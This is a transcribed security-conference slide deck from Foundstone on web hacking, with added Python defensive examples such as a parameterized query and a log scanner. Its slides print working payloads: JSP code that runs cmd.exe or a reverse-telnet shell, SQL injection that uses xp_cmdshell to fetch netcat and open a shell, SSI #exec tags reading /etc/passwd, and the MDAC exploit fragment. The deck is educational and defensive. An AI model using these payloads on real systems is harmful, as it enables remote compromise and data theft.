Web Hacking
Saumil Shah, JD Glaser
Foundstone Inc.

Recipe for an E-Commerce roll-out
Basic Ingredients: (serves 1 mid-range network)
- Web Server
- Application Server
- Database Server
- and a Firewall (for extra spicy flavour)

Recipe for an E-Commerce roll-out
Dressing / Sauces: (optional, but improves flavour)
- Load Balancer
- Reverse Proxy servers
- Cache systems

Recipe for an E-Commerce roll-out
[Diagram: the Web Client sends an HTTP request (cleartext or SSL) through the Firewall to the Web Server (Apache, IIS, Netscape, etc.); the Web Server runs Web app plugins (Perl, C/C++, JSP, etc.), which reach the SQL Database over a database connection (ADO, ODBC, etc.); the HTTP reply (HTML, Javascript, VBscript, etc.) returns to the client.]

Traditional Hacking
- Targeted against vulnerabilities in OS components and Network services.
- Attacks specific to operating system architecture, authentication, services, etc.
- Myriad of exploits for different services, OS platforms, CPU architectures, etc.

Traditional Hacking
- Requires rocket science such as coding shell-code for buffer-overflows, etc.
- In short, it is a complex activity.
[Slide shows a fragment of x86 assembly from winsock shell-code (labels winsock_found, socket_ok, sockerr).]

Traditional Hacking - Limitations
- Modern network architectures are getting more robust and secure.

- Firewalls being used in almost all network roll-outs.
- OS vendors learning from past mistakes (?) and coming out with patches rapidly.
- Increased maturity in coding practices.

Traditional Hacking - Limitations
- Hacks on OS network services prevented by firewalls.
[Diagram: attacks on wu-ftpd, Sun RPC and NT ipc$ are blocked (X) at the firewall in front of the Web Server, Web apps and DB.]

Traditional Hacking - Limitations
- Internal back-end application servers are on a non-routable IP network (private addresses).
[Diagram: direct access to the Web apps and DB behind the Web Server is blocked (X).]

The Next Generation of Hacking
- E-commerce / Web hacking is unfettered.
- Web traffic is the most commonly allowed of protocols through Internet firewalls.
- Why fight the wall when you've got an open door?
- HTTP is perceived as friendly traffic.
- Content/Application based attacks are still perceived as rare.

The Web Hacker's Toolbox

- Essentially, all a web hacker needs is a web browser, an Internet connection, and a clear mind.

Types of Web Hacks
- URL Interpretation attacks: web server misconfiguration.
- Input Validation attacks: poor checking of user inputs.
- SQL Query Poisoning: extend SQL statements.
- Reverse-engineering HTTP cookies, HTTP session hijacking, Impersonation.
[Diagram, built up over four slides: each class of attack is placed on the path Web Client -> Web Server -> Web apps -> DB, with URL Interpretation attacks at the Web Server, Input Validation attacks at the Web apps, SQL Query Poisoning at the DB, and cookie reverse-engineering / session hijacking between the Web Client and the Web Server.]

The Web Hacker's Toolbox
- Some desired accessories would be a port scanner, netcat, a vulnerability checker (e.g. whisker), OpenSSL, etc.

Basic Web Kung-fu Moves
Web Port Scanning:
- Look for well-known TCP web ports: 80, 81, 443, 8000, 8080, etc.
- FScan (from Foundstone): fscan -p 80,81,443,8000,8080 <host>
- nmap (by Fyodor): nmap -p 80,81,443,8000,8080 <host>

Basic Web Kung-fu Moves
Web Server Fingerprinting:
- HTTP Banner grabbing.
- netcat as a TCP client (even telnet works):
    nc <host> 80
    HEAD / HTTP/1.0
- Advanced HTTP directives: TRACE, OPTIONS, etc.

Basic Web Kung-fu Moves
Checking for Low Hanging Fruits:
- Known web vulnerabilities.
- Whisker (by Rain Forest Puppy): ./whisker.pl -h <host> -I 1
- cgichk.c, Retina, etc.

Some Advanced Web Kung-fu Moves
Hacking over SSL:
- OpenSSL: openssl s_client -connect <host>:443, then type HEAD / HTTP/1.0
- SSLProxy.

Hacking over SSL
Some SSL Myths:
- "We are secure because we use SSL!"
- "Strong 128 bit crypto being used."
- "We use Digital Certificates signed by VeriSign."

Hacking over SSL
- Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy!
- Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL, so the same cleartext tools work against an SSL server.
[Diagram: web client -> nc -> openssl -> (SSL) -> web server.]

Our Targets
- NT: WebLogic, IIS, Java Web Server.

- Linux: Apache, ServletExec.
- NT: IIS, SQL Server.

Use the Source, Luke
WebLogic / WebSphere JSP bug:
- Discovered by Shreeraj Shah, Foundstone.
- Ability to retrieve source code of JSP/JHTML files.
- Classic example of web server misconfiguration.
- Using uppercase JSP in the URL causes the server to return unparsed JSP code.

Source Code Disclosure
WebLogic / WebSphere JSP bug example: How it works
- HTTP Request: index.JSP
- WebLogic Server handler registrations:
    weblogic.httpd.register.file=weblogic.servlet.FileServlet
    weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
    weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
    weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
- The request index.JSP matches none of the html, shtml, jhtml or jsp handlers (the *.jsp pattern is matched case-sensitively), so it falls through to the default handler, FileServlet, which serves the file as-is.
- On the server's filesystem index.JSP = index.jsp, so the raw JSP source is returned instead of going through "Process JSP tags -> Java Compiler -> Java Runtime".
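An added model of the handler lookup just described (not code from the deck or from WebLogic): the registrations are the ones on the slide, while the matching logic, function names and the `fold_case` switch are assumptions. With `fold_case=True` the extension is folded before matching, which is the configuration-side fix on a case-insensitive filesystem.

```python
# Handler registrations copied from the WebLogic properties excerpt on the slide.
REGISTER = {
    "file":    "weblogic.servlet.FileServlet",              # default: serves bytes as-is
    "*.shtml": "weblogic.servlet.ServerSideIncludeServlet",
    "*.jhtml": "weblogic.servlet.jhtmlc.PageCompileServlet",
    "*.jsp":   "weblogic.servlet.JSPServlet",
}
DEFAULT = REGISTER["file"]


def resolve(path, fold_case=False):
    """Pick the handler for a request path the way the slide describes:
    match the extension against the registered patterns, otherwise fall
    back to the default file handler.  fold_case=False reproduces the
    case-sensitive matching that causes the disclosure."""
    name = path.rsplit("/", 1)[-1]
    if "." not in name:
        return DEFAULT
    ext = name.rsplit(".", 1)[1]
    if fold_case:
        ext = ext.lower()
    return REGISTER.get("*." + ext, DEFAULT)


def leaks_source(path, fs_case_insensitive=True):
    """True when the request is handed to the raw file handler although the
    file it will actually open belongs to a compiling handler.  On a
    case-insensitive filesystem (NT) index.JSP opens index.jsp, so the
    unparsed JSP source goes out to the client."""
    if resolve(path) != DEFAULT:
        return False                      # a compiling handler took it
    if not fs_case_insensitive:
        return False                      # index.JSP simply does not exist: 404
    return resolve(path, fold_case=True) != DEFAULT


def audit(request_paths, fs_case_insensitive=True):
    """Return the request paths (e.g. pulled from an access log) that would
    disclose source under the registrations above."""
    return [p for p in request_paths if leaks_source(p, fs_case_insensitive)]
```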

More Source Code Disclosure
URL prefixes for source code disclosure:
- /servlet/file/ (IBM WebSphere)
- /file/ (BEA WebLogic)
- /*.shtml/ (BEA WebLogic)
- /ConsoleHelp/ (BEA WebLogic)
- /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
Advisories on Foundstone's advisories page: http://www.foundstone.com/advisories.htm

Another example
IIS +.htr bug:
- View source code of ASP/ASA files.
- URL interpretation vulnerability.
- .htr causes ISM.DLL to handle the URL.
- Characters after the + sign (space) are ignored.

Other Source Code Disclosures
- Some applications access files without appropriate checking.
- Input validation vulnerability.
- No checking performed for file type or location.
- Filenames can be manipulated via parameters passed on the URL or as hidden fields.
- Example: showcode.asp or codebrws.asp

IIS showcode.asp
- Bundled with IIS samples in NT Option Pack 4.0.
- Allows an attacker to view arbitrary files using the following URL:
    showcode.asp?source=/msadc/../../../../../path/to/file.name
[Slide: showcode.asp example screenshot.]

Input Validation and SSI
- SSI (Server Side Includes) tags allow commands to be executed locally on the system via #exec tags.
- Some applications save user inputs on a local file.
- Malicious SSI tags can be uploaded via such applications.
- The result: Remote Command Execution!

SSI - guestbook.pl
- guestbook.pl: one of the many free CGI scripts available.
- Vulnerable on servers that parse .html files through SSI.

SSI - guestbook.pl
- Insert SSI tags as guestbook comments, e.g. an #exec tag carrying: cat /etc/passwd; xterm &

SSI - guestbook.pl
- The guestbook comment contains an SSI tag which is saved in guestbook.html on the server.
- .html files are registered to be parsed by mod_ssi, causing the SSI tags to be parsed and the command executed.
[Diagram: addguest.html -> guestbook.pl -> guestbook.html; when guestbook.html is requested, mod_ssi on the web server runs the embedded command, returning passwd and launching /usr/X11/bin/xterm -display <host>.]

Web Server Architecture Attacks
- Sometimes the way web servers are implemented can lead to vulnerabilities.
- A common attack is to bypass the web server configuration directives, and invoke built-in procedures directly.
- A close look at the web server architecture can reveal holes.

Web Server Architecture Attacks

[Diagram of handler dispatch inside the Web Server:
  html handler    -> text/html header -> html
  shtml handler   -> Process SSI tags (#include, #exec) -> include file / sh, perl, /bin/sh -> text/html header -> shtml
  cgi handler     -> script/executable -> cgi
  jsp handler     -> Process JSP tags -> Java Compiler -> Java Runtime -> class -> jsp
  default handler -> ??]

Web Server Architecture Attacks
Handler Forcing:
- Certain mis-configurations allow for handlers to be forced onto files that are not supposed to be processed by them.
- Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned as-is.

Web Server Architecture Attacks
Handler Forcing:
- Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time!

Handler Forcing
Sun Java Web Server:
- Direct servlet invocation by the /servlet/ prefix.
- Can force the PageCompile handler (servlet) on any file in the web document directory.
- Files get compiled and executed as JSPs!
- Discovered by Shreeraj Shah, Foundstone.

Handler Forcing
Sun Java Web Server:
- Exploit: /servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/path/to/file.html
[Diagram: the JSP PageCompile handler is forced on to html files, so instead of the html handler (text/html header) the request goes through the jsp handler -> Process JSP tags -> Java Compiler -> Java Runtime -> class.]

Handler Forcing
Sun Java Web Server: Bulletin Board example.
- User comments stored in board.html.
- Users can upload arbitrary JSP code in board.html.
- Forcing handlers causes compilation and execution of arbitrary code.
- Can lead to root level compromise.

Handler Forcing
On NT:

JSP code for invoking cmd.exe:
    <%@ page import="java.io.*" %>
    <%String s=null,t="";try{Process p=Runtime.getRuntime().exec("cmd /c dir c: /w");BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){t+=s;}}catch(IOException e){e.printStackTrace();}%>
    <%=t %>

Handler Forcing
On Unix (if xterm is not present):
JSP code for Reverse Telnet:
    <%@ page import="java.io.*" %>
    <%String s=null,t="";try{Process p=Runtime.getRuntime().exec("/bin/sh telnet <host> 2000 | /bin/sh | telnet <host> 2001");BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){t+=s;}}catch(IOException e){e.printStackTrace();}%>
    <%=t %>

SQL Query Poisoning
- Poor input validation on parameters passed to SQL queries can be disastrous.
- For example (ASP):
    Dim sql_con, result, sql_qry
    Const CONNECT_STRING = "Provider=SQLOLEDB;SERVER=WEB_DB;UID=sa;PWD=xyzzy"
    sql_qry = "SELECT * FROM PRODUCT WHERE ID = " & Request.QueryString("ID")
    Set objCon = Server.CreateObject("ADODB.Connection")
    objCon.Open CONNECT_STRING
    Set objRS = objCon.Execute(sql_qry)
- The ID parameter is concatenated straight into the query text, with no type check, and the connection runs as sa.

SQL Query Poisoning
Return all rows:
- ID=3+OR+1=1
- Resultant query: SELECT * FROM PRODUCT WHERE ID = 3 OR 1 = 1

SQL Query Poisoning
Drop Table:
- ID=3%01DROP+TABLE+PRODUCT
- Resultant query: SELECT * FROM PRODUCT WHERE ID = 3 DROP TABLE PRODUCT (the %01 byte separates the two statements)

SQL Query Poisoning
Remote Command Execution!
- ID=3%01EXEC+master..xp_cmdshell+tftp+-i+<tftp server>+GET+nc.exe+%26%26+nc+-e+cmd.exe+<host>+2000
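An added illustration, not code from the deck: the concatenation of the ASP snippet above and a type-checked, parameterized counterpart, redone in Python against an in-memory SQLite table standing in for PRODUCT (the rows are constructed). It shows that the same `3 OR 1=1` value that widens the concatenated WHERE clause is rejected outright once the parameter is treated as an integer and bound.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the PRODUCT table on the slide (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT)")
    conn.executemany("INSERT INTO PRODUCT VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget"), (3, "gizmo")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """String concatenation exactly as in the ASP snippet: the request
    parameter becomes part of the SQL text, so 'ID=3 OR 1=1' extends the
    WHERE clause and every row comes back."""
    sql = "SELECT * FROM PRODUCT WHERE ID = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """Validate the type first, then bind the value as a parameter: the SQL
    text is fixed, and anything that is not an integer (including
    '3 OR 1=1' or '3\\x01DROP TABLE PRODUCT') raises ValueError before any
    query runs."""
    product_id = int(raw_id)
    return conn.execute("SELECT * FROM PRODUCT WHERE ID = ?",
                        (product_id,)).fetchall()
```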

- Command executed: tftp -i <tftp server> GET nc.exe && nc -e cmd.exe <host> 2000

SQL Query Poisoning
How it works:
[Diagram: (1) the Web Browser sends the poisoned request to IIS 4.0 / ASP, which runs SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i <tftp server> GET nc.exe && nc -e cmd.exe <host> 2000 against the DB; (2) a tftp server is used to get nc.exe transferred over to the NT IIS box; (3) nc.exe connects back to a listener at port 2001, which receives the connection and a C:\>_ prompt.]

The MDAC Hack
- Vulnerability with Microsoft Data Access Components (msadcs.dll).
- Discovered by Rain Forest Puppy.
- MDAC allows remote users to perform SQL queries without authentication.
- Only the DSN needs to be known.
- SQL queries can be crafted to execute arbitrary commands.

The MDAC Hack
Exploit (from mdac.pl):
    $query="Select * from Customers where City='|shell(\"$command\")|'";
    $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";
- Gain Administrator Privileges on NT!

The MDAC Hack
How it works:
[Diagram: (1) mdac.pl (exploit) sends the request to msadcs.dll on IIS 4.0, which runs SELECT * FROM Customers WHERE City = |shell($command)| against the DB; (2) a tftp server is used to get nc.exe transferred over to the NT IIS box; (3) nc.exe connects back to a listener at port 2001, which receives the connection and a C:\>_ prompt.]

And last but not the least...
The IIS Unicode bug:
- URL Parsing vulnerability.
- Improper handling of illegal Unicode sequences.
- Allows remote users to execute arbitrary commands on the web server under the context of IUSR.
- Can lead to potential Administrator level access.

The IIS Unicode bug
- Exploit: a request path containing the illegal sequence %c0%af, which IIS decodes as / after its path checks, reaching winnt/system32/cmd.exe?/c+dir
- Can use HTTP POST to send multiple commands at a time to cmd.exe.

Surprise Demonstration
- One-way hacking.
- All activity performed through LEGAL HTTP requests.
- No outbound connections, no tftp, no listeners.
- Administrator compromise of NT.

Root Causes of Web Hacks
- Complex web architectures may cause oversight in web server configuration.
- URL Parsing.
- File Canonicalization.

- Combination of underlying operating system and web server may leave holes.

Root Causes of Web Hacks
- Untested code used in web applications, to save time.
- Level of security consciousness low in web application developers.
- Security vs. convenience.
- Security vs. time-to-market.
- Zero knowledge administration breeds zero knowledge administrators.

Web Security Measures
- Heighten security awareness amongst administrators, developers and, most important, TOP MANAGEMENT!
- Firewalls and SSL do not solve all security problems.
- Keep abreast of latest vendor advisories and patches.
- Monitor security mailing lists such as BugTraq.

Web Security Measures
- Follow secure coding practices.
- Perform extensive code reviews and application testing, especially for input validation.
- Follow the principle of least privilege.
- Read Security Issues in CNET Builder.com!
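Since the deck's own point is that every attack above travels inside ordinary-looking HTTP requests, here is an added log-review example (not the deck's code) that decodes request URIs and flags the request shapes the slides describe: overlong UTF-8 lead bytes (the %c0%af trick), control characters such as %01, the +.htr suffix, the /servlet/ handler-forcing prefix, xp_cmdshell, the OR 1=1 tautology, and case-mismatched .jsp/.jhtml/.shtml extensions. The sample lines, rule names and function names are constructed assumptions; the rules are deliberately narrow and meant as a starting point for a review script, not a complete filter.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed request lines in "METHOD URI STATUS" form (not real logs): the
# URIs mirror the request shapes on the slides plus two ordinary requests.
SAMPLE_LOG = """\
GET /index.jsp 200
GET /index.JSP 200
GET /..%c0%af../winnt/system32/cmd.exe?/c+dir 200
GET /global.asa+.htr 200
GET /servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html 200
GET /product.asp?ID=3%01EXEC+master..xp_cmdshell+dir 500
GET /product.asp?ID=3+OR+1=1 200
GET /images/logo.gif 200
"""


def findings(uri):
    """Return the sorted list of rule names the decoded URI trips."""
    raw = unquote_to_bytes(uri)                 # %xx -> bytes; '+' is left alone
    low = raw.decode("latin-1").lower()         # one char per byte, never fails
    name = uri.split("?", 1)[0].rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    hits = []
    if b"\xc0" in raw or b"\xc1" in raw:        # lead bytes that are always overlong UTF-8
        hits.append("overlong-utf8")
    if any(b < 0x20 for b in raw):              # e.g. %01 used to glue a second SQL statement
        hits.append("control-char")
    if re.search(r"\+\.htr\b", low):            # '+.htr' hands the URL to ISM.DLL
        hits.append("htr-suffix")
    if "/servlet/com.sun.server.http.pagecompile" in low or "/servlet/file/" in low:
        hits.append("servlet-prefix")           # direct servlet invocation / handler forcing
    if "xp_cmdshell" in low:
        hits.append("xp_cmdshell")
    if re.search(r"\bor\s+1\s*=\s*1\b", low.replace("+", " ")):
        hits.append("sql-tautology")
    if ext.lower() in ("jsp", "jhtml", "shtml") and ext != ext.lower():
        hits.append("case-mismatched-ext")      # index.JSP reaching the default file handler
    return sorted(hits)


def scan_log(text):
    """Map each suspicious URI in the log text to the rules it tripped."""
    report = {}
    for line in text.splitlines():
        method, uri, status = line.split()
        hits = findings(uri)
        if hits:
            report[uri] = hits
    return report
```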

Thank You!
Saumil Shah, JD Glaser

